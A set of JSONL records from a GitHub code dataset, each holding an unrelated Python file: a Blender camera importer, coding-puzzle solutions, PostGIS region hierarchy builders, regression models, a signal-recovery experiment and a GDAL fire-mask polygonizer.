\n next_block = tg.get_block_underneath(current_block)\n if next_block != None:\n previous_node = add_node_on_nest_lvl(current_block)\n current_block = get_next_block()\n continue\n \nprint('Printing AST...') \ntg.print_AST(root)","repo_name":"VasilisPoulos/tangibles-recognition","sub_path":"tangibles.py","file_name":"tangibles.py","file_ext":"py","file_size_in_byte":12834,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71996240466","text":"# Copyright (c) 2016-2019, Thomas Larsson\r\n# All rights reserved.\r\n#\r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions are met:\r\n#\r\n# 1. Redistributions of source code must retain the above copyright notice, this\r\n# list of conditions and the following disclaimer.\r\n# 2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution.\r\n#\r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\r\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\r\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\r\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\r\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\r\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\r\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\r\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\r\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\r\n#\r\n# The views and conclusions contained in the software and documentation are those\r\n# of the authors and should not be interpreted as representing official policies,\r\n# either expressed or implied, of the FreeBSD Project.\r\n\r\n\r\nimport bpy\r\nimport math\r\nfrom .node import Node\r\nfrom .settings import theSettings\r\n\r\nclass Camera(Node):\r\n\r\n def __init__(self, fileref):\r\n Node.__init__(self, fileref)\r\n self.perspective = {}\r\n self.orthographic = {}\r\n self.channels = {}\r\n self.aspectRatio = 1.0\r\n\r\n\r\n def __repr__(self):\r\n return (\"\" % (self.id))\r\n\r\n\r\n def parse(self, struct):\r\n Node.parse(self, struct)\r\n if \"perspective\" in struct.keys():\r\n self.perspective = struct[\"perspective\"]\r\n elif \"orthographic\" in struct.keys():\r\n self.orthographic = struct[\"orthographic\"]\r\n if \"extra\" in struct.keys():\r\n for estruct in struct[\"extra\"]:\r\n if estruct[\"type\"] == \"studio_node_channels\":\r\n self.channels = estruct[\"channels\"]\r\n\r\n\r\n def postTransform(self):\r\n from .settings import theSettings\r\n if theSettings.zup:\r\n ob = self.rna\r\n ob.rotation_euler[0] += math.pi/2\r\n\r\n\r\n def build(self, context, inst=None):\r\n if self.perspective:\r\n self.data = bpy.data.cameras.new(self.name)\r\n self.setCameraProps(self.perspective)\r\n elif self.orthographic:\r\n self.data = bpy.data.cameras.new(self.name)\r\n self.setCameraProps(self.orthographic)\r\n else:\r\n return None\r\n #print(\"Camera\", self.data)\r\n self.buildChannels()\r\n Node.build(self, context, inst)\r\n\r\n\r\n def setCameraProps(self, props):\r\n camera = self.data\r\n 
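# Translate DSON camera properties to Blender camera settings; length-valued entries (clip planes, focus distance) are scaled by theSettings.scale.\r\n 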
for key,value in props.items():\r\n #print(\"Camera\", key, value)\r\n if key == \"znear\" :\r\n camera.clip_start = value * theSettings.scale\r\n elif key == \"zfar\" :\r\n camera.clip_end = value * theSettings.scale\r\n elif key == \"yfov\" :\r\n pass\r\n elif key == \"focal_length\" :\r\n camera.lens = value\r\n elif key == \"depth_of_field\" :\r\n pass\r\n elif key == \"focal_distance\" :\r\n self.setFocusDist(camera, value * theSettings.scale * 0.1)\r\n elif key == \"fstop\" :\r\n self.setFStop(camera, value)\r\n else:\r\n print(\"Unknown camera prop: '%s' %s\" % (key, value))\r\n\r\n\r\n def setFocusDist(self, camera, value):\r\n if bpy.app.version < (2,80,0):\r\n camera.dof_distance = value\r\n else:\r\n camera.dof.focus_distance = value\r\n\r\n\r\n def setFStop(self, camera, value):\r\n if bpy.app.version < (2,80,0):\r\n camera.gpu_dof.fstop = value\r\n camera.cycles.aperture_fstop = value\r\n else:\r\n camera.dof.aperture_fstop = value\r\n\r\n\r\n def buildChannels(self):\r\n from .asset import getCurrentValue\r\n from .utils import D\r\n\r\n camera = self.data\r\n camera.sensor_width = 64\r\n for data in self.channels:\r\n channel = data[\"channel\"]\r\n key = channel[\"id\"]\r\n value = channel[\"current_value\"]\r\n if key == \"Lens Shift X\" :\r\n camera.shift_x = value * theSettings.scale\r\n elif key == \"Lens Shift Y\" :\r\n camera.shift_y = value * theSettings.scale\r\n elif key == \"Focal Length\":\r\n camera.lens = value # in mm\r\n elif key == \"Depth of Field\":\r\n self.setFocusDist(camera, value * theSettings.scale * 0.1)\r\n elif key == \"Frame Width\":\r\n pass\r\n #camera.sensor_width = value\r\n #camera.sensor_height = self.aspectRatio * value\r\n elif key == \"Aspect Ratio\":\r\n self.aspectRatio = value[1]/value[0]\r\n #camera.sensor_height = self.aspectRatio * camera.sensor_width\r\n elif key == \"Aperture Blades\":\r\n if bpy.app.version < (2,80,0):\r\n camera.gpu_dof.blades = value\r\n camera.cycles.aperture_blades = value\r\n else:\r\n camera.dof.aperture_blades = value\r\n elif key == \"Aperture Blade Rotation\":\r\n if bpy.app.version < (2,80,0):\r\n camera.cycles.aperture_rotation = value*D\r\n else:\r\n camera.dof.aperture_rotation = value*D\r\n\r\n elif key in [\"Point At\", \"Renderable\", \"Visible\", \"Selectable\", \"Perspective\",\r\n \"Render Priority\", \"Cast Shadows\", \"Pixel Size\",\r\n \"Lens Stereo Offset\", \"Lens Radial Bias\", \"Lens Stereo Offset\",\r\n \"Lens Distortion Type\", \"Lens Distortion K1\", \"Lens Distortion K2\", \"Lens Distortion K3\", \"Lens Distortion Scale\",\r\n \"DOF\", \"Aperature\", \"Disable Transform\", \"Visible in Simulation\",\r\n \"Lens Thickness\", \"Local Dimensions\", \"Dimension Preset\", \"Constrain Proportions\",\r\n \"HeadlampMode\", \"Headlamp Intensity\", \"XHeadlampOffset\", \"YHeadlamp\", \"ZHeadlampOffset\",\r\n \"Display Persistence\", \"Sight Line Opacity\",\r\n \"Focal Point Scale\", \"FOV Color\", \"FOV Opacity\", \"FOV Length\",\r\n \"DOF Plane Visibility\", \"DOF Plane Color\",\r\n \"Visible in Viewport\", \r\n \"DOF Overlay Color\", \"DOF Overlay Opacity\", \"Near DOF Plane Visibility\", \"Far DOF Plane Visibility\",\r\n ]:\r\n #print(\"Unused\", key, value)\r\n pass\r\n else:\r\n print(\"Unknown camera channel '%s' %s\" % (key, value))\r\n","repo_name":"Diffeomorphic/import-daz","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} 
+{"seq_id":"36444987425","text":"#1\r\nclass Solution(object):\r\n def twoSum(self, nums, target):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type target: int\r\n :rtype: List[int]\r\n \"\"\"\r\n pool={}\r\n for idx,item in enumerate(nums):\r\n residual = target - item\r\n if residual in pool:\r\n res_idx = pool[residual]\r\n return [idx,res_idx] \r\n else:\r\n pool[item]=idx","repo_name":"GuilinZ/leecode","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73906127506","text":"import sys\n\nto_binary = {\"0\": \"000\", \"1\": \"001\", \"2\": \"010\", \"3\": \"011\", \"4\": \"100\",\n \"5\": \"101\", \"6\": \"110\", \"7\": \"111\"}\n\n\ndef main():\n octet = sys.stdin.readline().rstrip()\n answer = \"\"\n\n for i in range(len(octet)):\n answer += to_binary[octet[i]]\n\n if answer[0] == \"0\":\n if answer[1] == \"0\":\n print(answer[2:])\n else:\n print(answer[1:])\n else:\n print(answer)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Kangsan-Jeon/AlgorithmTrain","sub_path":"Baekjoon/수학1/[완]1212_8진수 2진수.py","file_name":"[완]1212_8진수 2진수.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8125816051","text":"from collections import Counter\n\n\nclass Solution(object):\n def maximumTastiness(self, price, k):\n \"\"\"\n :type price: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n price.sort()\n print(price)\n diff = []\n for i in range(1, len(price)):\n diff.append(price[i] - price[i-1])\n print(diff)\n\n\nif __name__ == \"__main__\":\n price = [13,5,1,8,21,2]\n k = 3\n Solution().maximumTastiness(price, k)","repo_name":"YingbingZhu/python_leetcode","sub_path":"array/6270. Take K of Each Character From Left and Right.py","file_name":"6270. 
Take K of Each Character From Left and Right.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23899201333","text":"n=int(input())\narr=list(map(int,input().split()))\nm=int(input())\nnum=''\nfor elem in arr:\n num+=str(elem)\nfor i in range(0,len(num),m):\n if i+m>len(num):\n print(num[i:len(num)])\n else: \n print(num[i:i+m])\n","repo_name":"KimDongHyun0907/python-study","sub_path":"string_problem/divide_number.py","file_name":"divide_number.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13755055315","text":"import sys\nfrom heapq import heappop, heappush\n\n\ndef solve():\n input = sys.stdin.readline\n N = int(input())\n adj = [[] for _ in range(N)]\n for i in range(N - 1): # dist가 작으면 더 큰것\n u, v, dist = map(int, input().split())\n adj[u - 1].append([v - 1, dist])\n adj[v - 1].append([u - 1, dist])\n\n def dijkstra(start):\n min_heap = [[0, start]]\n visited = [0] * N\n dist = [float('inf') for _ in range(N)]\n dist[start] = 0\n top_dist, top_idx = 0, 0\n while min_heap:\n top_dist, top_idx = heappop(min_heap)\n if (visited[top_idx]):\n continue\n visited[top_idx] = 1\n for i, w in adj[top_idx]:\n if (visited[i] == 0 and top_dist + w < dist[i]):\n dist[i] = top_dist + w\n heappush(min_heap, [dist[i], i])\n return top_dist, top_idx\n\n print(dijkstra(dijkstra(0)[1])[0])\n\n\nsolve()\n","repo_name":"Daejjyu/Algorithm","sub_path":"Jungle/Week3_BFS, DFS, 위상정렬/00_exam_3_1967_트리의 지름.py","file_name":"00_exam_3_1967_트리의 지름.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73169873744","text":"from shapely.geometry import shape, Point\n\ndef load_centroids(db):\n q=f\"select gid,ST_AsGeoJSON(ST_Transform(geom,4326))::json from lsoa;\"\n db.cur.execute(q)\n print(\"executed...\")\n lsoas=[]\n r = db.cur.fetchone()\n while r:\n print(r[0])\n lsoas.append([r[0],shape(r[1]).centroid])\n r = db.cur.fetchone()\n return lsoas\n\ndef lsoa_to_msoa(db):\n db.create_tables({\"hierarchy_lsoa_to_msoa\":\n [[\"msoa\",\"int\"],\n [\"lsoa\",\"int\"]]});\n \n print(\"loading lsoa geom\")\n lsoas = load_centroids(db)\n \n # for each msoa\n q=f\"select gid from msoa;\"\n db.cur.execute(q)\n for msoa_geo_id in db.cur.fetchall():\n q=f\"select ST_AsGeoJSON(ST_Transform(geom,4326))::json from msoa where gid={msoa_geo_id[0]}\"\n db.cur.execute(q)\n msoa_geo = shape(db.cur.fetchone()[0])\n count=0\n for lsoa in lsoas:\n if msoa_geo.contains(lsoa[1]): \n count+=1\n q=f\"insert into hierarchy_lsoa_to_msoa (msoa, lsoa) values ({msoa_geo_id[0]},{lsoa[0]});\"\n db.cur.execute(q)\n print(\"msoa \"+str(msoa_geo_id)+\" has \"+str(count)+\" lsoas inside\")\n db.conn.commit() \n\ndef lsoa_to_counties(db):\n db.create_tables({\"hierarchy_lsoa_to_counties\":\n [[\"county\",\"int\"],\n [\"lsoa\",\"int\"]]});\n \n print(\"loading lsoa geom\")\n lsoas = load_centroids(db)\n \n # for each msoa\n q=f\"select gid from counties;\"\n db.cur.execute(q)\n for county_geo_id in db.cur.fetchall():\n q=f\"select ST_AsGeoJSON(ST_Transform(geom,4326))::json from counties where gid={county_geo_id[0]}\"\n db.cur.execute(q)\n county_geo = shape(db.cur.fetchone()[0])\n count=0\n for lsoa in lsoas:\n if county_geo.contains(lsoa[1]): \n count+=1\n q=f\"insert into hierarchy_lsoa_to_counties (county, lsoa) values 
({county_geo_id[0]},{lsoa[0]});\"\n db.cur.execute(q)\n print(\"county \"+str(county_geo_id)+\" has \"+str(count)+\" lsoas inside\")\n db.conn.commit() \n\n","repo_name":"UniExeterRSE/LCAT","sub_path":"data/builder/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41195992712","text":"def main():\r\n\r\n\r\n\tt = int(input())\r\n\r\n\twhile t:\r\n\r\n\t\tn = int(input())\r\n\t\ta = [int(x) for x in input().split()]\r\n\r\n\t\tprev = a[-1]\r\n\r\n\t\tcount = 0\r\n\r\n\t\tfor i in a[n-2::-1]:\r\n\r\n\t\t\tif i > prev:\r\n\r\n\t\t\t\tcount += 1\r\n\r\n\t\t\tprev = i \r\n\r\n\t\t\tif count > 1:\r\n\r\n\t\t\t\tprint(\"NO\")\r\n\t\t\t\tbreak\r\n\r\n\t\telse:\r\n\r\n\t\t\tif count == 0:\r\n\r\n\t\t\t\tprint(\"YES\")\r\n\t\t\t\r\n\t\t\telse:\r\n\r\n\t\t\t\tif a[0] >= a[-1]:\r\n\r\n\r\n\t\t\t\t\tprint(\"YES\")\r\n\r\n\t\t\t\telse:\r\n\r\n\t\t\t\t\tprint(\"NO\")\r\n\r\n\t\tt -= 1\r\n\r\nmain()","repo_name":"priyo97/CodeChef-snackdown19","sub_path":"1A/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25169384365","text":"import json\nfrom os import path, mkdir\n\ndef check_create(folder):\n\tif path.exists(folder): \n\t\tprint(f'Folder {folder} already exists.')\n\telse:\n\t\tmkdir(folder)\n\t\tprint(f'Folder {folder} created!')\n\ndef format(content, formatter):\n\tif not formatter: return content\n\tif 'json': return json.dumps(content, indent=2)\n\ndef write_file(filename, content, formatter=None, folder=None):\n\tif folder: filename = folder + ('/' if folder[-1] != '/' else '') + filename\n\twith open(filename, 'w+') as f:\n\t\tcontent = format(content, formatter)\n\t\tf.write(content)\n","repo_name":"produdez/kangaroo-detection","sub_path":"src/utils/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26274503615","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 23 20:03:45 2021\n\n@author: Shay Kreymer\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport utils\n\nnp.random.seed(10)\n\nL = 8\nN = 1.23 * 10**7\nN = int(N)\ngamma = 0.2\n\nx = np.random.rand(L)\nx = x / np.linalg.norm(x)\ny_clean = utils.generate_micrograph_1d(x, gamma, L, N)\n\nSNR = 0.5\nsigma2 = (np.linalg.norm(x) ** 2) / (L * SNR)\ny = y_clean + np.random.normal(loc=0, scale=np.sqrt(sigma2), size=np.shape(y_clean))\n\nshifts_2nd = utils.shifts_2nd(L)\n\nshifts_3rd = utils.shifts_3rd_reduced(L)\n\n\nL2 = len(shifts_2nd)\nL3 = len(shifts_3rd)\nW = utils.calc_W_heuristic(shifts_2nd, shifts_3rd)\n\n\ngamma0 = 0.18\n\nestimations_mom = []\nestimations_gmm = []\n\nx0 = np.random.rand(L)\nx0 = (np.linalg.norm(x) ** 2) * x0 / np.linalg.norm(x0)\n\nx_gamma0 = np.concatenate((x0, np.array([gamma0])))\n \nsizes = np.array([10**5, 10**6, 10**7])\nfor sz in sizes:\n sz = int(sz)\n yi = y[:sz]\n\n ac1_yi = utils.ac1(yi)\n \n ac2_yi = np.zeros((len(shifts_2nd), ))\n for (i, shift) in enumerate(shifts_2nd):\n ac2_yi[i] = utils.ac2(yi, shift)\n \n ac3_yi = np.zeros((len(shifts_3rd), ))\n for (i, shifts) in enumerate(shifts_3rd):\n ac3_yi[i] = utils.ac3(yi, shifts[0], shifts[1])\n \n samplesi = utils.sample(yi, L)\n del yi\n \n estimation_mom = utils.opt(x_gamma0, ac1_yi, ac2_yi, ac3_yi, shifts_2nd, shifts_3rd, sigma2, 
W)\n estimations_mom.append(estimation_mom)\n \n f_gmm = utils.calc_function_gmm(samplesi, gamma0, x0, shifts_2nd, shifts_3rd, sigma2)\n del samplesi\n cov_f = np.cov(f_gmm)\n del f_gmm\n W_gmm = np.linalg.inv(np.sqrt(N) * cov_f)\n W_gmm = W_gmm\n \n estimation_gmm = utils.opt(x_gamma0, ac1_yi, ac2_yi, ac3_yi, shifts_2nd, shifts_3rd, sigma2, W_gmm)\n estimations_gmm.append(estimation_gmm)\n \nerrs_mom = [np.linalg.norm(estimations_mom[i].x[:-1] - x) / np.linalg.norm(x) for i in range(3)]\nerrs_gmm = [np.linalg.norm(estimations_gmm[i].x[:-1] - x) / np.linalg.norm(x) for i in range(3)]\n# %% plots\nplt.close(\"all\")\nwith plt.style.context('ieee'):\n fig = plt.figure()\n plt.plot(x, label='Ground truth', lw=2)\n plt.plot(estimations_mom[0].x[:-1], lw=2, label='Autocorrelation analysis')\n plt.plot(estimations_gmm[0].x[:-1], lw=2, label='Generalized autocorrelation analysis')\n plt.ylim((0, 0.6))\n plt.legend(loc=1, fontsize=6)\n plt.xlim((0, 7))\n fig.tight_layout()\n plt.show()\n\n fig = plt.figure()\n plt.plot(x, label='Ground truth')\n plt.plot(estimations_mom[1].x[:-1], lw=2, label='Autocorrelation analysis')\n plt.plot(estimations_gmm[1].x[:-1], lw=2, label='Generalized autocorrelation analysis')\n plt.legend()\n plt.ylim((0, 0.6))\n plt.legend(loc=1, fontsize=6)\n plt.xlim((0, 7))\n fig.tight_layout()\n plt.show()\n \n fig = plt.figure()\n plt.plot(x, label='Ground truth')\n plt.plot(estimations_mom[2].x[:-1], lw=2, label='Autocorrelation analysis')\n plt.plot(estimations_gmm[2].x[:-1], lw=2, label='Generalized autocorrelation analysis')\n plt.legend()\n plt.ylim((0, 0.6))\n plt.legend(loc=1, fontsize=6)\n plt.xlim((0, 7))\n fig.tight_layout()\n plt.show()\n \n fig = plt.figure()\n plt.loglog(sizes, errs_mom, 'ro-', lw=2, label='Autocorrelation analysis')\n plt.loglog(sizes, errs_gmm, 'bo--', lw=2, label='Generalized autocorrelation analysis')\n plt.xticks(sizes)\n plt.xlabel('N')\n plt.ylabel('recovery error')\n plt.legend(loc=1, fontsize=6)\n fig.tight_layout()\n plt.show()\n \n","repo_name":"krshay/MTD-GMM","sub_path":"experiment_recovery.py","file_name":"experiment_recovery.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40732446470","text":"def bsearch(x, xs): # Списъкът трябва да е сортиран, ако не е - не работи!\n\n left = 0\n right = len(xs) - 1\n\n while left <= right:\n\n mid = (left + right) // 2\n\n if xs[mid] == x:\n return True\n elif x < xs[mid]:\n right = mid - 1\n else:\n left = mid + 1\n\n return False\n\nprint(bsearch(5, [4, 5, 7, 8, 9, 10, 12, 999])) # True\nprint(bsearch(3, [4, 5, 7, 8, 9, 10, 12, 999])) # False\nprint(bsearch(5, [4, 5, 5, 5, 7, 8, 9, 10, 12, 999])) # True\nprint(bsearch(0, [])) # False\n","repo_name":"AnetaStoycheva/Programming0_HackBulgaria","sub_path":"Week 10/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73259907026","text":"from sklearn.linear_model import ElasticNet, Lasso, BayesianRidge, LassoLarsIC\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\nfrom sklearn.model_selection import KFold, cross_val_score, train_test_split\nfrom 
sklearn.metrics import mean_squared_error\nimport xgboost as xgb\nimport lightgbm as lgb\n\nimport numpy as np\n\n\n# 1. Define a cross-validation strategy\nn_folds = 5\n\ntrain.drop(\"Id\", axis = 1, inplace = True)\ntest.drop(\"Id\", axis = 1, inplace = True)\n\ndef rmsle_cv(model):\n kf = KFold(n_folds, shuffle=True, random_state=42).get_n_splits(train.values)\n rmse= np.sqrt(-cross_val_score(model, train.values, y_train, scoring=\"neg_mean_squared_error\", cv = kf))\n return(rmse)\n\n#Models\n\nlasso = make_pipeline(RobustScaler(), Lasso(alpha =0.0005, random_state=1))\nENet = make_pipeline(RobustScaler(), ElasticNet(alpha=0.0005, l1_ratio=.9, random_state=3))\nKRR = KernelRidge(alpha=0.6, kernel='polynomial', degree=2, coef0=2.5)\n\nGBoost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05,\n max_depth=4, max_features='sqrt',\n min_samples_leaf=15, min_samples_split=10, \n loss='huber', random_state =5)\n\nmodel_xgb = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468, \n learning_rate=0.05, max_depth=3, \n min_child_weight=1.7817, n_estimators=2200,\n reg_alpha=0.4640, reg_lambda=0.8571,\n subsample=0.5213, silent=1,\n random_state =7, nthread = -1)\n\nmodel_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=5,\n learning_rate=0.05, n_estimators=720,\n max_bin = 55, bagging_fraction = 0.8,\n bagging_freq = 5, feature_fraction = 0.2319,\n feature_fraction_seed=9, bagging_seed=9,\n min_data_in_leaf =6, min_sum_hessian_in_leaf = 11)\n\nscore = rmsle_cv(lasso)\nprint(\"\\nLasso score: {:.4f} ({:.4f})\\n\".format(score.mean(), score.std()))\nscore = rmsle_cv(ENet)\nprint(\"ElasticNet score: {:.4f} ({:.4f})\\n\".format(score.mean(), score.std()))","repo_name":"dashmoment/kaggle_house_price","sub_path":"stacked_regrssion/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"70206817427","text":"''' 202207 Polygonize a raster mask (values 0 or 1, data type and format otherwise not assumed)\n\n(*) Output in same coordinate reference system as source data \n\nBased on a module by Sybrand Strauss: \n https://github.com/bcgov/wps/blob/story/classify_hfi/api/scripts/polygonize_hfi.py#L52\n\n20230825 '''\nimport os\nimport sys\nimport json\nimport time\nimport tempfile\nimport numpy as np\nfrom osgeo import ogr\nfrom osgeo import gdal\nfrom osgeo import osr\nfrom misc import exist, err, args, run, sep\n\ndef is_dst():\n t = time.localtime()\n print(t)\n return t.tm_isdst\n\nfire_number = None\nimage_date = None\ntime_stamp = None\n\npwd = os.path.abspath( os.getcwd())\nw = pwd.split(sep)\nif w[-3] == 'active':\n print(\"ACTIVE\")\n print(\"Fire_number\", w[-2])\n print(\"Image date\", w[-1])\n fire_number = w[-2]\n image_date = w[-1]\n \n # get image timestamp(s): assume the most frequent of the observed timestamps\nelse:\n print(w)\n print(pwd)\n err('required to be run from within the active/FIRE_NUMBER folder')\n\nts_count = {} # count different timestamps: most frequent this folder assumed. 
Good practice to run this from active/FIRE_NUMBER type folder.\nlines = [x.strip() for x in os.popen(\"ls -1 S2*\").readlines()]\nfor line in lines:\n line = line.strip()\n try:\n w = line.split('_')\n print(w)\n\n time_stamp = int(w[2].split('T')[1][:4]) - (700 if is_dst()==1 else 800)\n # todo: accumulate/count these values in ts_count, retain key with largest count.\n except:\n pass\n# sys.exit(1)\n\nif len(args) < 2:\n err('python3 binary_polygonize.py [input raster mask file 1/0 values]')\n\n# let's crop the result\nrun('rm -f ' + args[1] + '*pad*')\nrun('rm -f ' + args[1] + '*crop*')\nif not exist(args[1] + '_crop.bin_pad.bin'):\n run('crop ' + args[1])\n run('pad ' + args[1] + '_crop.bin 111')\n run('cp ' + args[1] + '_crop.bin_pad.bin ' + args[1])\n run('cp ' + args[1] + '_crop.bin_pad.hdr ' + args[1][:-3] + 'hdr')\nrun('po sub.bin ' + args[1] + ' sub_project.bin')\nrun('mv sub_project.bin sub.bin')\nrun('mv sub_project.hdr sub.hdr')\n\n\ndef create_in_memory_band(data: np.ndarray, cols, rows, projection, geotransform):\n mem_driver = gdal.GetDriverByName('MEM')\n dataset = mem_driver.Create('memory', cols, rows, 1, gdal.GDT_Byte)\n dataset.SetProjection(projection)\n dataset.SetGeoTransform(geotransform)\n band = dataset.GetRasterBand(1)\n band.WriteArray(data)\n return dataset, band\n\ndef polygonize(geotiff_filename, filename):\n raster = gdal.Open(geotiff_filename, gdal.GA_ReadOnly)\n band = raster.GetRasterBand(1)\n src_projection, geotransform = raster.GetProjection(), raster.GetGeoTransform()\n print(src_projection)\n #print(geotransform)\n rows, cols = band.YSize, band.XSize\n \n # source coordinate reference system\n srs = osr.SpatialReference()\n srs.ImportFromWkt(raster.GetProjectionRef()) # as in: https://trac.osgeo.org/gdal/browser/trunk/gdal/swig/python/scripts/gdal_polygonize.py#L237\n # generate mask data\n mask_data = np.where(band.ReadAsArray() == 0, False, True)\n mask_ds, mask_band = create_in_memory_band(mask_data, cols, rows, src_projection, geotransform)\n\n # Create output \n driver = ogr.GetDriverByName('ESRI Shapefile') #GeoJSON')\n dst_ds = driver.CreateDataSource(filename)\n # dst_ds.SetProjection(src_projection) # AttributeError: 'DataSource' object has no attribute 'SetProjection'\n # dst_ds.SetGeoTransform(geotransform)\n\n # add layer\n dst_layer = dst_ds.CreateLayer('fire') # not sure how to get the CRS info into the output\n # dst_layer.SetProjection(src_projection) # AttributeError: 'Layer' object has no attribute 'SetProjection'\n # dst_layer.SetGeoTransform(geotransform)\n\n field_name = ogr.FieldDefn(\"fire\", ogr.OFTInteger)\n field_name.SetWidth(24)\n dst_layer.CreateField(field_name)\n gdal.Polygonize(band, mask_band, dst_layer, 0, [], callback=None) # polygonize\n dst_ds.FlushCache()\n del dst_ds, raster, mask_ds # print(f'{filename} written')\n open(args[1] + '.prj', 'wb').write(str(src_projection).encode())\n\npolygonize(args[1],\n args[1] + '.shp')\n\nrun(' '.join(['ogr2ogr -f \"KML\"',\n args[1] + '.kml',\n args[1] + '.shp']))\n\nif True:\n run('sentinel2_trace_active_alpha.py ' + args[1])\n\n\n# assume were in an active/fire_number directory, rename the files accordingly for the product format specification.\n\nif fire_number is not None and image_date is not None:\n print(\"ACTIVE\")\n # have fire_number (fire ID) and image date. \n # find the symbolic links to S2 data files, in the present directory. 
And/or real files (legacy compatibility)\n # ls -1 S2*.bin\n # count the date-time stamps, use the most-occurring observed pair (date, time)\n\n # current year:\n # time.localtime()\n # time.struct_time(tm_year=2023\n current_year = str(time.localtime().tm_year).zfill(4)[2:4] \n print(\"current_year\", current_year)\n\n file_string = '_'.join([current_year, str(fire_number), str(image_date), str(time_stamp), 'detection', 'sentinel2'])\n print(file_string)\n\n lines = [x.strip() for x in os.popen('ls -1atr result*.kml').readlines()]\n recent_kml = lines[-1]\n print(\"recent_kml\", recent_kml) \n run('cp ' + recent_kml + ' ' + file_string + '.kml')\n\n lines = [x.strip() for x in os.popen('ls -1atr poly*.kml').readlines()]\n recent_alpha = lines[-1]\n print(\"recent_alpha\", recent_alpha)\n run('cp ' + recent_alpha + ' ' + file_string + '_alpha.kml')\n\n\n recent_tif = 'sub.bin_ht.bin_smult.tif'\n run('rm -f ' + recent_tif)\n if not exist(recent_tif):\n run('envi2tif.py sub.bin')\n run('cp ' + recent_tif + ' ' + file_string + '.tif')\n\n run('chmod 755 23_*')\n\n'''\nosgeo.ogr.GetDriverByName vs osgeo.gdal.GetDriverByName\nOk - so - ogr == vectors ; gdal == raster\nhttps://pcjericks.github.io/py-gdalogr-cookbook/projection.html#get-projection\n'''\n","repo_name":"bcgov/wps-research","sub_path":"py/binary_polygonize.py","file_name":"binary_polygonize.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"}
